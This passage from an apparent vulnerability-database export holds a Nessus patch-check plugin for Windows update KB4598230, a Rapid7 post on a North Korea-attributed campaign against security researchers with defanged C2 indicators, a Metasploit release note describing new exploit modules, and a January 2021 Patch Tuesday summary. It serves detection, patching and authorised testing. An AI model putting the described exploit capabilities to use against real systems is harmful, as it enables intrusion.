CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598230/windows-10-update-kb4598230\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8370504\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598230.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598230'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598230])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-02-05T20:48:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "\n\n_This blog was co-authored by Caitlin Condon, VRM Security Research Manager, and Bob Rudis, Senior Director and Chief Security Data Scientist._\n\nOn Monday, Jan. 25, 2021, Google\u2019s Threat Analysis Group (TAG) [published a blog on a widespread social engineering campaign](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) that targeted security researchers working on vulnerability research and development. The campaign, which Google attributed to North Korean (DPRK) state-sponsored actors, has been active for several months and sought to compromise researchers using several methods.\n\nRapid7 is aware that many security researchers were targeted in this campaign, and information is still developing. While we currently have no evidence that we were compromised, we are continuing to investigate logs and examine our systems for any of the [IOCs listed in Google\u2019s analysis](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>). We will update this post with further information as it becomes available.\n\nOrganizations should take note that this was a highly sophisticated attack that was important enough to those who orchestrated it for them to burn an as-yet unknown exploit path on. This event is the latest in a chain of attacks\u2014e.g., those targeting SonicWall, VMware, Mimecast, Malwarebytes, Microsoft, Crowdstrike, and SolarWinds\u2014that demonstrates a significant increase in threat activity targeting cybersecurity firms with legitimately sophisticated campaigns. Scenarios like these should become standard components of tabletop exercises and active defense plans.\n\n## North Korean-attributed social engineering campaign\n\nGoogle discovered that the DPRK threat actors had built credibility by establishing a vulnerability research blog and several Twitter profiles to interact with potential targets. They published videos of their alleged exploits, including a YouTube video of a fake proof-of-concept (PoC) exploit for CVE-2021-1647\u2014a [high-profile Windows Defender zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>) that garnered attention from both security researchers and the media. The DPRK actors also published \u201cguest\u201d research (likely plagiarized from other researchers) on their blog to further build their reputation.\n\nThe malicious actors then used two methods to social engineer targets into accepting malware or visiting a malicious website. [According to Google](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>):\n\n * After establishing initial communications, **the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project.** Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional pre-compiled library (DLL) that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled command and control (C2) domains.\nVisual Studio Build Events command executed when building the provided VS Project files. Image provided by Google.\n\n * In addition to targeting users via social engineering, Google also observed several cases where researchers have been compromised after visiting the actors\u2019 blog. In each of these cases, the researchers followed a link on Twitter to a write-up hosted on `blog[.]br0vvnn[.]io`, and shortly thereafter, a malicious service was installed on the researcher\u2019s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. **At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.** As of Jan. 26, 2021, Google was unable to confirm the mechanism of compromise.\n\nThe blog the DPRK threat actors used to execute this zero-day drive-by attack was posted on Reddit as long as three months ago. The actors also used a range of social media and communications platforms to interact with targets\u2014including Telegram, Keybase, Twitter, LinkedIn, and Discord. As of Jan. 26, 2021, many of these profiles have been suspended or deactivated.\n\n## Rapid7 customers\n\nGoogle\u2019s threat intelligence includes information on IOCs, command-and-control domains, actor-controlled social media accounts, and compromised domains used as part of the campaign. Rapid7's MDR team is deploying IOCs and behavior-based detections. These detections will also be available to InsightIDR customers later today. We will update this blog post with further information as it becomes available.\n\n## Defender guidance\n\nTAG noted in their blog post that **they have so far only seen actors targeting Windows systems.** As of the evening of Jan. 25, 2021, researchers across many companies [confirmed on Twitter](<https://twitter.com/richinseattle/status/1353864756109578241>) that they had interacted with the DPRK actors and/or visited the malicious blog. Organizations that believe their researchers or other employees may have been targeted should conduct internal investigations to determine whether indicators of compromise are present on their networks.\n\nAt a minimum, responders should:\n\n * Ensure members of all security teams are aware of this campaign and encourage individuals to report if they believe they were targeted by these actors.\n * Search web traffic, firewall, and DNS logs for evidence of contacts to the domains and URLs provided by Google in their post.\n * According to [Rapid7 Labs\u2019 forward DNS archive](<https://opendata.rapid7.com>), the `br0vvnn[.]io` apex domain has had two discovered fully qualified domain names (FQDNs)\u2014`api[.]br0vvnn[.]io` and `blog[.]br0vvnn[.]io`\u2014over the past four months with IP addresses `192[.]169[.]6[.]31` and `192[.]52[.]167[.]169`, respectively. Contacts to those IPs should also be investigated in historical access records.\n * Check for evidence of the provided hashes on all systems, starting with those operated and accessed by members of security teams.\n\nMoving forward, organizations and individuals should heed Google\u2019s advice that _\u201cif you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.\u201d_\n\n## Updates\n\n2021-02-05 \u2022 As Rapid7 is a cybersecurity vendor with many security researchers on staff, we began an internal investigation immediately after this campaign was disclosed to determine if there was any impact to us or our researchers. We have completed our investigation and have found no evidence of compromise. If or when new information arises, we will perform additional investigations and provide further updates at that time.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2021-01-26T15:01:33", "published": "2021-01-26T15:01:33", "id": "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "href": "https://blog.rapid7.com/2021/01/26/state-sponsored-threat-actors-target-security-researchers/", "type": "rapid7blog", "title": "State-Sponsored Threat Actors Target Security Researchers", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-28T04:47:53", "bulletinFamily": "info", "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "description": "\n\nMetasploit keeping that developer awareness rate up.\n\n\n\nThanks to [mr_me](<https://github.com/stevenseeley>) &amp; [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -&gt; ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-10-23T18:56:55", "published": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T00:48:37", "bulletinFamily": "info", "cvelist": ["CVE-2020-26870", "CVE-2021-1636", "CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1641", "CVE-2021-1642", "CVE-2021-1643", "CVE-2021-1644", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1677", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1707", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710", "CVE-2021-1711", "CVE-2021-1712", "CVE-2021-1713", "CVE-2021-1714", "CVE-2021-1715", "CVE-2021-1716", "CVE-2021-1717", "CVE-2021-1718", "CVE-2021-1719", "CVE-2021-1723", "CVE-2021-1725"], "description": "\n\nWe arrive at the first Patch Tuesday of 2021 ([2021-Jan](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>)) with 83 vulnerabilities across our standard spread of products. Windows Operating System vulnerabilities dominated this month's advisories, followed by Microsoft Office (which includes the SharePoint family of products), and lastly some from less frequent products such as Microsoft System Center and Microsoft SQL Server.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 65 \nESU | 35 \nMicrosoft Office | 11 \nDeveloper Tools | 5 \nSQL Server | 1 \nApps | 1 \nSystem Center | 1 \nAzure | 1 \nBrowser | 1 \n \n### [Microsoft Defender Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>) (CVE-2021-1647)\n\nCVE-2021-1647 is marked as a CVSS 7.8, actively exploited, remote code execution vulnerability through the Microsoft Malware Protection Engine (mpengine.dll) between version 1.1.17600.5 up to 1.1.17700.4. \n\nAs a default, Microsoft's affected antimalware software will automatically keep the Microsoft Malware Protection Engine up to date. What this means, however, is that no further action is needed to resolve this vulnerability unless non-standard configurations are used. \n\nThis vulnerability affects Windows Defender or the supported Endpoint Protection pieces of the System Center family of products (2012, 2012 R2, and namesake version: Microsoft System Center Endpoint Protection).\n\n### Patching Windows Operating Systems Next\n\nAnother confirmation of the standard advice of prioritizing Operating System patches whenever possible is that 11 of the 13 top CVSS-scoring (CVSSv3 8.8) vulnerabilities addressed in this month's Patch Tuesday would be immediately covered through these means. As an interesting observation, the Windows Remote Procedure Call Runtime component appears to have been given extra scrutiny this month. This RPC Runtime component accounts for the 9 of the 13 top CVSS scoring vulnerabilities along with half of all the 10 Critical Remote Code Execution vulnerabilities being addressed.\n\n### More Work to be Done\n\nLastly, some minor calls to note that this Patch Tuesday includes SQL Server as that is an atypical family covered during Patch Tuesdays and, arguably more notable, is a reminder that [Adobe Flash has officially reached end-of-life](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support>) and would've been actively removed from all browsers via Windows Update (already).\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1677](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1677>) | Azure Active Directory Pod Identity Spoofing Vulnerability | No | No | 5.5 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1705](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1705>) | Microsoft Edge (HTML-based) Memory Corruption Vulnerability | No | No | 4.2 | No \n \n## Developer Tools Vulnerabilities\n\ncve | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2020-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7 | Yes \n[CVE-2021-1725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1725>) | Bot Framework SDK Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1723>) | ASP.NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Developer Tools Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1651>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1680](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1680>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1715](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1715>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1716>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1641>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1717](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1717>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1718](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1718>) | Microsoft SharePoint Server Tampering Vulnerability | No | No | 8 | No \n[CVE-2021-1707](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1707>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-1712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1712>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1719](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1719>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1711](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1711>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1713>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1714](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1714>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1636>) | Microsoft SQL Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647>) | Microsoft Defender Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1681>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1686>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1687>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1690](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1690>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1646>) | Windows WLAN Service Elevation of Privilege Vulnerability | No | No | 6.6 | No \n[CVE-2021-1650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1650>) | Windows Runtime C++ Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1663](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1663>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1670>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1672>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1689](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1689>) | Windows Multipoint Management Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1682>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1697](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1697>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1662>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No 